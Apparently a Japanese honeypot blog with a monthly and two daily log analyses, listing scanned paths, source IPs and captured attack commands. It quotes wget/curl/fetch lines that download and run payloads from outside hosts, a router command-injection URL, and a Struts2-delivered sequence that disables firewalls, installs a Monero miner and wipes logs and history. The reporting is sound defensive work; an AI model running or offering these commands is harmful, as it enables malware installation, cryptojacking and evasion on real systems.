ハニーポットのログ分析(2018年07月度)
2018年7月度の統計による分析です。
まずは、件数の推移です。7月度の総アクセス件数は5,266件でした。
さほど大きな件数にはなっていません。前月対比では減少傾向です。
全体としての件数は少ないながら、まれにスパイクする日もあります。
メソッドとパスの統計トップ20です。
アクセス数が多い日に集中してアクセスが多いものが多く、そうでないものは一部MyPhPAdminに関するもののようです。
複数検知していたIoTを狙った攻撃もアクセス数ベースで見るとさほどでもないようです。
| method | path | count |
| GET | / | 1114 |
| GET | /manager/html | 516 |
| POST | /command.php | 153 |
| GET | /index.action | 145 |
| HEAD | / | 68 |
| GET | /phpMyAdmin/index.php | 47 |
| GET | /pma/index.php | 45 |
| GET | /pmd/index.php | 44 |
| POST | /qq.php | 43 |
| GET | /mysqladmin/index.php | 43 |
| GET | /web/phpMyAdmin/index.php | 42 |
| GET | /pmamy2/index.php | 42 |
| GET | /pmamy/index.php | 42 |
| GET | /phpmyadmin0/index.php | 41 |
| GET | /phpmyadmin/index.php | 41 |
| GET | /admin/index.php | 41 |
| GET | /PMA/index.php | 41 |
| GET | /index.php | 40 |
| GET | /dbadmin/index.php | 40 |
| GET | /db/index.php | 40 |
一応、送信元IPの統計トップ20です。大体同じくらいで出ているということは、それだけ攻撃者側が頻繁に攻撃基盤を乗り換えながら実行していることかと思います。
| srcIP | count |
| 39.108.54.xx | 334 |
| 179.218.108.xx | 156 |
| 47.52.105.xx | 135 |
| 139.219.10.xx | 135 |
| 116.196.89.xx | 121 |
| 103.98.115.xx | 120 |
| 89.248.172.xx | 119 |
| 47.106.168.xx | 113 |
| 139.199.111.xx | 111 |
| 120.79.154.xx | 111 |
| 122.152.197.xx | 108 |
| 123.56.216.xx | 104 |
| 111.231.223.xx | 102 |
| 211.159.164.x | 101 |
| 183.131.83.xx | 99 |
| 120.77.36.xx | 99 |
| 203.195.224.xx | 97 |
| 120.78.185.xxx | 95 |
| 47.52.225.xxx | 93 |
| 103.212.183.xxx | 93 |
ハンティングログの統計です。
| path | counts |
| wget hxxp://199.195.254.118/dlink | 14 |
| wget hxxp://104.244.72.82/k | 12 |
| wget -c hxxp://wap.tfddos.net:57843/linux | 11 |
| wget -c hxxp://111.67.194.29:32322/Manager | 10 |
| wget+hxxp://199.195.254.118/jaws | 9 |
| wget hxxp://185.62.190.191/r | 8 |
| wget hxxp://178.128.11.199/rvs | 7 |
| wget hxxp://178.128.11.199/qtx.mips | 7 |
| wget -P /tmp hxxp://hfs.mhacker.cc:9278/Linux.server | 6 |
| wget hxxp://185.172.164.41/e | 6 |
| wget -c hxxp://aaa.linuxa.club:57843/linux | 5 |
| wget hxxp://g.mariokartayy.com/x | 4 |
| wget hxxp://222.186.153.142:26591/nodebase | 4 |
| wget -c -q hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 3 |
| wget -c hxxp://103.55.13.68:81/server | 3 |
| fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 3 |
| curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 3 |
| wget hxxp://mafiagalati.hi2.ro/unix ; curl -O hxxp://mafiagalati.hi2.ro/unix ; fetch hxxp://mafiagalati.hi2.ro/unix | 2 |
| wget hxxp://hakaiboatnet.pw/dlink | 2 |
| wget -c hxxp://23.249.162.123:9998/servic | 2 |
| fetch hxxp://mafiagalati.hi2.ro/unix | 2 |
| curl -O hxxp://mafiagalati.hi2.ro/unix ; fetch hxxp://mafiagalati.hi2.ro/unix | 2 |
| wget hxxp://xo.alprazolam.rip/dlink | 1 |
| wget hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 1 |
| wget hxxp://217.61.6.127/t | 1 |
| wget -c -q hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr ; curl -O hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr; fetch hxxp://139.199.211.175/data/data/msr | 1 |
| wget -c hxxp://23.249.162.123:9998/se1 | 1 |
| wget -c hxxp://111.67.194.29:4444/Manager | 1 |
| wget -c hxxp://103.55.13.68:81/servic | 1 |
| wget -c hxxp://103.55.13.68:81/nux | 1 |
| fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 1 |
| fetch hxxp://139.199.211.175/data/data/msr | 1 |
| curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr | 1 |
| curl -O hxxp://139.199.211.175/data/data/msr;perl msr;rm -rf msr; fetch hxxp://139.199.211.175/data/data/msr | 1 |
統計はとりましたが、面白いものになっているかというと…という感じですので、見せ方は何か継続して考えたいと思います。
以上です。
ハニーポットのログ分析(2018/08/07)
WOWhoneypotの2018/08/07(火) (運用65日目)の簡易分析です。
本日の総アクセス件数は 199件です。以下が全アクセスログです。
29 2018-08-07 GET /
4 2018-08-07 POST /qq.php
3 2018-08-07 POST /qaq.php
2 2018-08-07 POST /xx.php
2 2018-08-07 POST /q.php
2 2018-08-07 GET /www/phpMyAdmin/index.php
2 2018-08-07 GET /web/phpMyAdmin/index.php
2 2018-08-07 GET /tools/phpMyAdmin/index.php
2 2018-08-07 GET /shell.php
2 2018-08-07 GET /phpMyAdmin/phpMyAdmin/index.php
2 2018-08-07 GET /phpMyAdmin/index.php
2 2018-08-07 GET /cmd.php
2 2018-08-07 GET /claroline/phpMyAdmin/index.php
2 2018-08-07 GET /admin/phpMyAdmin/index.php
2 2018-08-07 CONNECT 133.130.126[.]119:43
1 2018-08-07 PROPFIND /
1 2018-08-07 POST /zuoshou.php
1 2018-08-07 POST /zuo.php
1 2018-08-07 POST /yumo.php
1 2018-08-07 POST /yao.php
1 2018-08-07 POST /xw.php
1 2018-08-07 POST /xw1.php
1 2018-08-07 POST /xshell.php
1 2018-08-07 POST /xiao.php
1 2018-08-07 POST /xiaomar.php
1 2018-08-07 POST /xiaoma.php
1 2018-08-07 POST /xiaomae.php
1 2018-08-07 POST /wuwu11.php
1 2018-08-07 POST /wshell.php
1 2018-08-07 POST /w.php
1 2018-08-07 POST /wp-admins.php
1 2018-08-07 POST /weixiao.php
1 2018-08-07 POST /webslee.php
1 2018-08-07 POST /wc.php
1 2018-08-07 POST /wan.php
1 2018-08-07 POST /wanan.php
1 2018-08-07 POST /test.php
1 2018-08-07 POST /system.php
1 2018-08-07 POST /ssaa.php
1 2018-08-07 POST /s.php
1 2018-08-07 POST /sheep.php
1 2018-08-07 POST /qwe.php
1 2018-08-07 POST /post.php
1 2018-08-07 POST /phpStudy.php
1 2018-08-07 POST /phpstudy.php
1 2018-08-07 POST /phpinfi.php
1 2018-08-07 POST /pe.php
1 2018-08-07 POST /mz.php
1 2018-08-07 POST /mx.php
1 2018-08-07 POST /m.php?pbid=open
1 2018-08-07 POST /min.php
1 2018-08-07 POST /log.php
1 2018-08-07 POST /lindex.php
1 2018-08-07 POST /l8.php
1 2018-08-07 POST /l7.php
1 2018-08-07 POST /ip.php
1 2018-08-07 POST /infoo.php
1 2018-08-07 POST /hm.php
1 2018-08-07 POST /hh.php
1 2018-08-07 POST /h1.php
1 2018-08-07 POST /feixiang.php
1 2018-08-07 POST /fack.php
1 2018-08-07 POST /defect.php
1 2018-08-07 POST /db_session.init.php
1 2018-08-07 POST /db.init.php
1 2018-08-07 POST /db__.init.php
1 2018-08-07 POST /db_desql.php
1 2018-08-07 POST /db_dataml.php
1 2018-08-07 POST /data.php
1 2018-08-07 POST /conflg.php
1 2018-08-07 POST /cmd.php
1 2018-08-07 POST /cainiao.php
1 2018-08-07 POST /bak.php
1 2018-08-07 POST /aw.php
1 2018-08-07 POST /aotu.php
1 2018-08-07 POST /angge.php
1 2018-08-07 POST /ak.php
1 2018-08-07 POST /ak48.php
1 2018-08-07 POST /ak47.php
1 2018-08-07 POST /9678.php
1 2018-08-07 POST /56.php
1 2018-08-07 POST /3.php
1 2018-08-07 POST /12.php
1 2018-08-07 POST /1213.php
1 2018-08-07 GET /z.php
1 2018-08-07 GET /x.php
1 2018-08-07 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-08-07 GET /xampp/phpmyadmin/index.php
1 2018-08-07 GET /wpo.php
1 2018-08-07 GET /wp-config.php
1 2018-08-07 GET /webdav/
1 2018-08-07 GET /uploader.php
1 2018-08-07 GET /typo3/phpmyadmin/index.php
1 2018-08-07 GET /text.php
1 2018-08-07 GET /test.php
1 2018-08-07 GET /_query.php
1 2018-08-07 GET /pmd_online.php
1 2018-08-07 GET /pmd/index.php
1 2018-08-07 GET /pma-old/index.php
1 2018-08-07 GET /pmamy/index.php
1 2018-08-07 GET /pmamy2/index.php
1 2018-08-07 GET /PMA/index.php
1 2018-08-07 GET /pma/index.php
1 2018-08-07 GET /PMA2/index.php
1 2018-08-07 GET /phpmyadmin/phpmyadmin/index.php
1 2018-08-07 GET /phpMyAdminold/index.php
1 2018-08-07 GET /phpMyAdmin.old/index.php
1 2018-08-07 GET /phpmyadmin-old/index.php
1 2018-08-07 GET /phpmyadmin/index.php
1 2018-08-07 GET /phpMyadmin_bak/index.php
1 2018-08-07 GET /phpmyadmin2/index.php
1 2018-08-07 GET /phpmyadmin1/index.php
1 2018-08-07 GET /phpmyadmin0/index.php
1 2018-08-07 GET /phpmyadmin
1 2018-08-07 GET /phpma/index.php
1 2018-08-07 GET /phpadmin/index.php
1 2018-08-07 GET /mysql/index.php
1 2018-08-07 GET /mysqladmin/index.php
1 2018-08-07 GET /mysql-admin/index.php
1 2018-08-07 GET /myadmin/index.php
1 2018-08-07 GET /myadmin2/index.php
1 2018-08-07 GET /muhstiks.php
1 2018-08-07 GET /muhstik.php
1 2018-08-07 GET /muhstik-dpr.php
1 2018-08-07 GET /muhstik2.php
1 2018-08-07 GET /lol.php
1 2018-08-07 GET /log.php
1 2018-08-07 GET /logon.php
1 2018-08-07 GET /license.php
1 2018-08-07 GET /lala.php
1 2018-08-07 GET /lala-dpr.php
1 2018-08-07 GET /knal.php
1 2018-08-07 GET /java.php
1 2018-08-07 GET /index.php
1 2018-08-07 GET /HNAP1/
1 2018-08-07 GET /help.php
1 2018-08-07 GET /help-e.php
1 2018-08-07 GET /hell.php
1 2018-08-07 GET /desktop.ini.php
1 2018-08-07 GET /db_pma.php
1 2018-08-07 GET /db/index.php
1 2018-08-07 GET /db_cts.php
1 2018-08-07 GET /dbadmin/index.php
1 2018-08-07 GET /cmx.php
1 2018-08-07 GET /cmv.php
1 2018-08-07 GET /cmdd.php
1 2018-08-07 GET /appserv.php
1 2018-08-07 GET /admin/PMA/index.php
1 2018-08-07 GET /admin/pma/index.php
1 2018-08-07 GET /admin/phpmyadmin/index.php
1 2018-08-07 GET /admin/phpmyadmin2/index.php
1 2018-08-07 GET /admin/mysql/index.php
1 2018-08-07 GET /admin/mysql2/index.php
1 2018-08-07 GET /admin/index.php
phpMyAdmin関連(48件)とphpに対する調査・攻撃(111件)と/へのアクセスを除外したアクセス数です。
2 2018-08-07 CONNECT 133.130.126[.]119:43
1 2018-08-07 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-08-07 GET /webdav/
1 2018-08-07 GET /HNAP1/
本日、phpMyAdminに対するスキャンを行ってきた攻撃者IPは合わせてphpに対する調査・攻撃も同一IPから実施していました。それ以外からの検知はほぼありませんでした。
その他4件はそれぞれ以下です。
・不正中継の調査
・PHPをリモートでデバッグするXDebugというツールの調査
・WebDAVの調査
・D-Link 社のルータにおける SOAPAction に対するコマンド実行の試み(CVE-2015-2051)があるかの調査行為
本日のハンティングログはありません。
以上です。
ハニーポットのログ分析(2018/08/06)
WOWhoneypotの2018/08/06(月)(運用64日目)の簡易分析です。
本日の総アクセス件数は 217件です。以下が全アクセスログです。
27 2018-08-06 GET /
21 2018-08-06 GET /index.action
7 2018-08-06 POST /qq.php
6 2018-08-06 POST /qaq.php
4 2018-08-06 POST /xx.php
4 2018-08-06 POST /q.php
2 2018-08-06 POST /zuoshou.php
2 2018-08-06 POST /yumo.php
2 2018-08-06 POST /yao.php
2 2018-08-06 POST /xw.php
2 2018-08-06 POST /xw1.php
2 2018-08-06 POST /xshell.php
2 2018-08-06 POST /xiao.php
2 2018-08-06 POST /xiaoma.php
2 2018-08-06 POST /wuwu11.php
2 2018-08-06 POST /wshell.php
2 2018-08-06 POST /w.php
2 2018-08-06 POST /weixiao.php
2 2018-08-06 POST /webslee.php
2 2018-08-06 POST /wc.php
2 2018-08-06 POST /wanan.php
2 2018-08-06 POST /system.php
2 2018-08-06 POST /ssaa.php
2 2018-08-06 POST /s.php
2 2018-08-06 POST /sheep.php
2 2018-08-06 POST /phpstudy.php
2 2018-08-06 POST /pe.php
2 2018-08-06 POST /mz.php
2 2018-08-06 POST /mx.php
2 2018-08-06 POST /min.php
2 2018-08-06 POST /log.php
2 2018-08-06 POST /lindex.php
2 2018-08-06 POST /l8.php
2 2018-08-06 POST /l7.php
2 2018-08-06 POST /hm.php
2 2018-08-06 POST /hh.php
2 2018-08-06 POST /feixiang.php
2 2018-08-06 POST /fack.php
2 2018-08-06 POST /defect.php
2 2018-08-06 POST /db_session.init.php
2 2018-08-06 POST /db.init.php
2 2018-08-06 POST /db__.init.php
2 2018-08-06 POST /data.php
2 2018-08-06 POST /conflg.php
2 2018-08-06 POST /cmd.php
2 2018-08-06 POST /cainiao.php
2 2018-08-06 POST /aw.php
2 2018-08-06 POST /aotu.php
2 2018-08-06 POST /angge.php
2 2018-08-06 POST /ak47.php
2 2018-08-06 POST /9678.php
2 2018-08-06 POST /56.php
2 2018-08-06 POST /12.php
2 2018-08-06 GET /webdav/
2 2018-08-06 GET hxxp://114.215.207[.]183:83/index.php
2 2018-08-06 GET /cmd.php
2 2018-08-06 CONNECT 133.130.126.119:43
1 2018-08-06 PROPFIND /
1 2018-08-06 POST /zuo.php
1 2018-08-06 POST /xiaomar.php
1 2018-08-06 POST /wp-admins.php
1 2018-08-06 POST /wan.php
1 2018-08-06 POST /test.php
1 2018-08-06 POST /qwe.php
1 2018-08-06 POST /m.php?pbid=open
1 2018-08-06 POST /ip.php
1 2018-08-06 POST /infoo.php
1 2018-08-06 POST /h1.php
1 2018-08-06 POST /bak.php
1 2018-08-06 POST /ak.php
1 2018-08-06 POST /3.php
1 2018-08-06 POST /1213.php
1 2018-08-06 GET /z.php
1 2018-08-06 GET /x.php
1 2018-08-06 GET /xmlrpc.php
1 2018-08-06 GET /wpo.php
1 2018-08-06 GET /wp-config.php
1 2018-08-06 GET /uploader.php
1 2018-08-06 GET /text.php
1 2018-08-06 GET /test.php
1 2018-08-06 GET /shell.php
1 2018-08-06 GET /_query.php
1 2018-08-06 GET /muhstiks.php
1 2018-08-06 GET /muhstik.php
1 2018-08-06 GET /muhstik-dpr.php
1 2018-08-06 GET /muhstik2.php
1 2018-08-06 GET /lol.php
1 2018-08-06 GET /log.php
1 2018-08-06 GET /logon.php
1 2018-08-06 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-06 GET /license.php
1 2018-08-06 GET /lala.php
1 2018-08-06 GET /lala-dpr.php
1 2018-08-06 GET /java.php
1 2018-08-06 GET /help.php
1 2018-08-06 GET /help-e.php
1 2018-08-06 GET /desktop.ini.php
1 2018-08-06 GET /db_pma.php
1 2018-08-06 GET /db_cts.php
1 2018-08-06 GET /cmx.php
1 2018-08-06 GET /cmv.php
1 2018-08-06 GET /cmdd.php
1 2018-08-06 GET /appserv.php
phpMyAdmin関連(0件)とphpに対する特定のアクセス(160件)と/へのアクセスを除外したアクセス数です。
21 2018-08-06 GET /index.action
2 2018-08-06 GET /webdav/
2 2018-08-06 GET hxxp://114.215.207[.]183:83/index.php
2 2018-08-06 CONNECT 133.130.126[.]119:43
1 2018-08-06 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
phpファイルに対するPOST/GETは計2IPから来ていました。片方のIPのみGETに対するアクセスもありました。
これらのアクセスはすべて「User-Agent: Mozilla/5.0」となっているのが特徴です。最近ではPOST通信では「変数=die(md5('PHP'));」となっています。
昨日同様、Struts2の脆弱性(CVE-2017-5638)を突く攻撃も来ています。全て同一IPで丁寧に攻撃コードを複数回に分けて投げてきていました。コマンドの部分のみ、抜粋すると以下となります。Moneroのコインマイナーを埋め込む動作と思われます。
(#cmd='whoami')
(#cmd='service iptables stop')
(#cmd='/etc/init.d/iptables stop')
(#cmd='SuSEfirewall2 stop')
(#cmd='reSuSEfirewall2 stop')
(#cmd='pkill -9 java.log;pkill -9 dmw;pkill -9 dwm;pkill -9 abcfg;pkiil -9 MAnager;pkill -9 hackqz;pkill -9 juschad;pkill -9 jusched;pkill -9 linux;pkill -9 Ashh;pkill -9 ._20170423Linux;pkill -9 bnn;pkill -9 cnnc;pkill -9 dcsysn;pkill -9 linux;pkill -9 lsess;pkill -9 sest;pkill -9 sss;pkill -9 s.ssh;pkill -9 s.ssh.1;pkill -9 svchese;pkill -9 system;pkill -9 systemi;pkill -9 systeml;pkill -9 systeml.1;pkill -9 systemt;pkill -9 systemt.1;pkill -9 winlogon')
(#cmd='chattr -i dwm;chattr -i dmw;chattr -i juschad;chattr -i jusched;chattr -i linux;chattr -i Ashh;chattr -i hackqz;chattr -i MAnager;chattr -i abcfg')
(#cmd='rm -f java.log.1;rm -f java.log.2;rm -f java.log.3;rm-f java.log.4;rm -f 03618.log.1;rm -f 03618.log.2;rm -rf hackqz;rm -rf MAnager;rm -rf abcfg;rm -rf dwm;rm -rf dmw;rm -rf Lin.1;rm -rf jusched;rm -rf juschad;rm -rf Ashh;rm -rf ._20170423Linux;rm -rf bnn;rm -rf cnnc;rm -rf dcsysn;rm -rf linux;rm -rf lsess;rm -rf sest;rm -rf sss;rm -rf s.ssh;rm -rf s.ssh.1;rm -rf svchese;rm -rf system;rm -rf systemi;rm -rf systeml;rm -rf systeml.1;rm -rf systemt;rm -rf systemt.1;rm -rf winlogon')
(#cmd='wget http://119.188.182[.]178:5198/javas.log')
(#cmd='chmod +x javas.log')
(#cmd='nohup /javas.log -B -a cryptonight -o stratum+tcp://monerohash[.]com:3333 -u 45NoK9sYEDS5hjiBdxTaYja9JnETCvusxDNtxf1wxHt2AM4qEav94uRhhWCEdHJWQJ1WJ5UfJmEfVXRA6kYvFQC7Pgfq5KR -p x > /dev/null 2>&1')
(#cmd='pkill -9 javas.log.1;pkill -9 javas.log.2;pkill -9 javas.log.3;pkill -9 javas.log.4;pkill -9 javas.log.5')
(#cmd='mv /bin/netstat /bin/tstat')
(#cmd='mv /usr/bin/wget /usr/bin/scet')
(#cmd='mv /usr/bin/scp /usr/bin/lcp')
(#cmd='mv /usr/bin/curl /usr/bin/cuy')
(#cmd='echo > /var/log/wtmp ')
(#cmd='echo >/var/log/wtmp')
(#cmd='echo > ./.bash_history')
(#cmd='history -c')
(#cmd='history -c')
その他はWebDAVの調査や不正中継の調査、Mirai亜種等でした。
本日のハンティングログは以下です。Mirai亜種とStruts2の脆弱性を攻撃するものです。
1 2018-08-06 wget hxxp://46.166.185[.]42/e
1 2018-08-06 wget hxxp://119.188.182[.]178:5198/javas.log
以上です。
